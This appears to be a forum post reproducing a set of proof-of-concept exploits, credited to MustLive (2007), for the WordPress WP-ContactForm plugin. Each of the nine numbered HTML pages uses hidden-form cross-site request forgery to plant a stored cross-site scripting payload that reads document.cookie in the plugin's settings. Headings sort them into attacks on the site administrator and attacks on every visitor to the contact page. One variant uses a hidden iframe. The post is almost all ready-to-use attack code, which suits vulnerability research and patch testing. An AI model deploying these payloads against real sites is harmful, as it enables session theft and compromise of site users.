For attacking admin only (at options page):
1
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
2
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
3
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
4
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
=====
For attacking every user of the site (at contact page):
5
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</form>
</body>
</html>
======
For attacking every user of the site at contact page (and admin at options page):
6
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
7
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
======
For attacking every user of the site (at contact page):
8
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>
9
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</form>
</body>
</html>